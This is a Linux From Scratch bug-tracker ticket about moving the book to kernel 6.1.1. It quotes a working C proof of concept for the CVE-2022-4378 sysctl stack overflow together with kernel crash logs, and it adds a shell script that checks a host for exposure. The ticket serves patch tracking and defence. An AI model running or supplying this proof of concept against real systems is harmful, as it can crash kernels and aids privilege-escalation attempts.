#5179 closed enhancement (fixed)
linux-6.1.1
| Reported by: | Douglas R. Reno | Owned by: | lfs-book |
|---|---|---|---|
| Priority: | high | Milestone: | 11.3 |
| Component: | Book | Version: | git |
| Severity: | normal | Keywords: | |
| Cc: | | | |
Description
New point version
Contains a fix for CVE-2022-4378, an exploitable stack-based buffer overflow. Note that you must have the Net and User namespaces enabled on your system, but those are common on BLFS installations due to applications such as UPower and QtWebEngine. I believe the "Net" namespace is also turned on by default when you run 'make defconfig'.
(from the posting in oss-security):
```c
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    /* Needs write access to this sysctl; the report notes that the Net and
     * User namespaces must be enabled for the PoC to reach the bug. */
    int fd = open("/proc/sys/net/ipv4/tcp_rmem", O_WRONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    /* Two pages filled with nothing but tab characters: no digits, no NUL. */
    void *a = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE,
                   MAP_ANON | MAP_PRIVATE, -1, 0);
    if (a == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memset(a, '\x09', 0x2000);

    /* The whitespace-only write is what trips the sysctl parser. */
    write(fd, a, 0x2000);
    return 0;
}
```
Upstream notes that the exploit will trigger a kernel panic on some systems. Using the proof-of-concept from the posting to oss-security, I get two different results:
x86_64
```
[1306077.805917] BUG: unable to handle page fault for address: ffffa2bc82500000
[1306077.805922] #PF: supervisor write access in kernel mode
[1306077.805924] #PF: error_code(0x0002) - not-present page
[1306077.805925] PGD 100000067 P4D 100000067 PUD 100128067 PMD 13ff5f067 PTE 0
[1306077.805929] Oops: 0002 [#1] PREEMPT SMP
[1306077.805931] CPU: 2 PID: 17151 Comm: poc Not tainted 6.0.6 #1
[1306077.805934] Hardware name: Dell Inc. OptiPlex 9020/0KC9NP, BIOS A14 09/14/2015
[1306077.805935] RIP: 0010:proc_get_long.constprop.0+0xb5/0x200
[1306077.805940] Code: 89 54 04 12 4c 89 ea 4c 29 ca 48 29 d6 48 01 c2 48 83 e2 f8 49 89 f2 48 83 fa 08 72 1a 48 89 d6 31 d2 48 83 e6 f8 4d 8b 1c 12 <4d> 89 1c 11 48 83 c2 08 48 39 f2 72 ef c6 44 04 1a 00 0f be 44 24
[1306077.805941] RSP: 0018:ffffa2bc824ffcd8 EFLAGS: 00010203
[1306077.805943] RAX: ffffffffffffefff RBX: ffffffffffffefff RCX: ffffa2bc824ffd7f
[1306077.805945] RDX: 0000000000000308 RSI: ffffffffffffeff8 RDI: ffffa2bc824ffd7f
[1306077.805946] RBP: ffffa2bc824ffd80 R08: ffffffffffffefff R09: ffffa2bc824ffcf8
[1306077.805947] R10: ffffa0d6d9ea2006 R11: 0000000000000000 R12: 0000000000000000
[1306077.805949] R13: ffffa2bc824ffcf2 R14: ffffa2bc824ffd88 R15: ffffa2bc824ffd90
[1306077.805950] FS:  00007fcfb033f740(0000) GS:ffffa0d756b00000(0000) knlGS:0000000000000000
[1306077.805952] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[1306077.805953] CR2: ffffa2bc82500000 CR3: 0000000195394005 CR4: 00000000001706e0
[1306077.805955] Call Trace:
[1306077.805957]  <TASK>
[1306077.805961]  </TASK>
[1306077.805962] Modules linked in:
[1306077.805964] CR2: ffffa2bc82500000
[1306077.805965] ---[ end trace 0000000000000000 ]---
[1306077.805967] RIP: 0010:proc_get_long.constprop.0+0xb5/0x200
[1306077.805969] Code: 89 54 04 12 4c 89 ea 4c 29 ca 48 29 d6 48 01 c2 48 83 e2 f8 49 89 f2 48 83 fa 08 72 1a 48 89 d6 31 d2 48 83 e6 f8 4d 8b 1c 12 <4d> 89 1c 11 48 83 c2 08 48 39 f2 72 ef c6 44 04 1a 00 0f be 44 24
[1306077.805970] RSP: 0018:ffffa2bc824ffcd8 EFLAGS: 00010203
[1306077.805972] RAX: ffffffffffffefff RBX: ffffffffffffefff RCX: ffffa2bc824ffd7f
[1306077.805973] RDX: 0000000000000308 RSI: ffffffffffffeff8 RDI: ffffa2bc824ffd7f
[1306077.805975] RBP: ffffa2bc824ffd80 R08: ffffffffffffefff R09: ffffa2bc824ffcf8
[1306077.805976] R10: ffffa0d6d9ea2006 R11: 0000000000000000 R12: 0000000000000000
[1306077.805977] R13: ffffa2bc824ffcf2 R14: ffffa2bc824ffd88 R15: ffffa2bc824ffd90
[1306077.805978] FS:  00007fcfb033f740(0000) GS:ffffa0d756b00000(0000) knlGS:0000000000000000
[1306077.805980] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[1306077.805981] CR2: ffffa2bc82500000 CR3: 0000000195394005 CR4: 00000000001706e0
```
i686
System will reboot with no evidence of a kernel panic once the program is run.
More details can be found here: https://seclists.org/oss-sec/2022/q4/178
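The report above ties exposure to two things: the running kernel version, and whether the Net and User namespaces are compiled in. The following script is an added example, not part of the ticket or of the LFS book, that turns those two conditions into a host check. It assumes the standard Kconfig symbol names CONFIG_NET_NS and CONFIG_USER_NS for the two namespaces, reads the running kernel's config from the conventional /proc/config.gz or /boot/config-$(uname -r) locations, and takes 6.1.1 (the version this ticket moves the book to) as the default minimum; pass a different minimum if you track another stable branch.

```sh
#!/bin/sh
# Added example (not from the ticket). Classifies a host against the
# CVE-2022-4378 report: is the kernel at least the fixed version, and if not,
# does it even have the namespaces the PoC needs? Assumptions: the Kconfig
# symbols CONFIG_NET_NS / CONFIG_USER_NS, the usual config file locations,
# and 6.1.1 as the default minimum version (taken from the ticket title).

# kconfig_enabled CONFIG_TEXT OPTION: succeed if the line "OPTION=y" is present.
kconfig_enabled() {
    printf '%s\n' "$1" | grep -qx "$2=y"
}

# kver_ge A B: succeed if version A is >= version B. Only the numeric
# X.Y.Z part is compared; local suffixes such as "-lfs" or "-rc1" are dropped.
kver_ge() {
    a=$(printf '%s' "$1" | sed 's/[^0-9.].*//')
    b=$(printf '%s' "$2" | sed 's/[^0-9.].*//')
    i=1
    while [ "$i" -le 3 ]; do
        x=$(printf '%s' "$a" | cut -d. -f"$i"); x=${x:-0}
        y=$(printf '%s' "$b" | cut -d. -f"$i"); y=${y:-0}
        if [ "$x" -gt "$y" ]; then return 0; fi
        if [ "$x" -lt "$y" ]; then return 1; fi
        i=$((i + 1))
    done
    return 0
}

# Print the running kernel's config text, trying the usual locations.
load_running_config() {
    if [ -r /proc/config.gz ]; then
        zcat /proc/config.gz
    elif [ -r "/boot/config-$(uname -r)" ]; then
        cat "/boot/config-$(uname -r)"
    else
        return 1
    fi
}

# assess CONFIG_TEXT KVER [MINVER]: prints exactly one of
#   patched            kernel version >= MINVER
#   exposed            older kernel with both namespaces enabled
#   precondition-unmet older kernel, but the report's namespace requirement
#                      is not met, so the PoC path is not reachable as described
assess() {
    cfg=$1; kver=$2; minver=${3:-6.1.1}
    if kver_ge "$kver" "$minver"; then
        echo patched
    elif kconfig_enabled "$cfg" CONFIG_NET_NS && kconfig_enabled "$cfg" CONFIG_USER_NS; then
        echo exposed
    else
        echo precondition-unmet
    fi
}

main() {
    cfg=$(load_running_config) || { echo "no kernel config found" >&2; exit 2; }
    assess "$cfg" "$(uname -r)" "${1:-6.1.1}"
}

# Only touch the live system when asked to, so the functions can be sourced.
if [ "${1:-}" = "--live" ]; then
    main "${2:-}"
fi
```

Run it as `sh kcheck.sh --live` (or `sh kcheck.sh --live 6.0.12` for a different minimum). A result of `patched` only means the running kernel is at or past the version you asked about; it does not know about backports on other stable branches, so choose the minimum for the branch you actually run.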
Change History (5)
comment:1 by , 2 years ago
comment:2 by , 2 years ago
Summary: linux-6.0.12 → linux-6.1 (Wait for 6.1.1)
We now have linux-6.1. It's supposed to have rust code, but I haven't looked at it yet.
comment:3 by , 2 years ago
Summary: linux-6.1 (Wait for 6.1.1) → linux-6.1.1
Note that this version also has a fix for CVE-2022-3435 ("ipv4: Handle attempt to delete multipath route when fib_info contains an nh reference") in it as well, according to https://linuxkernelcves.com/streams/6.0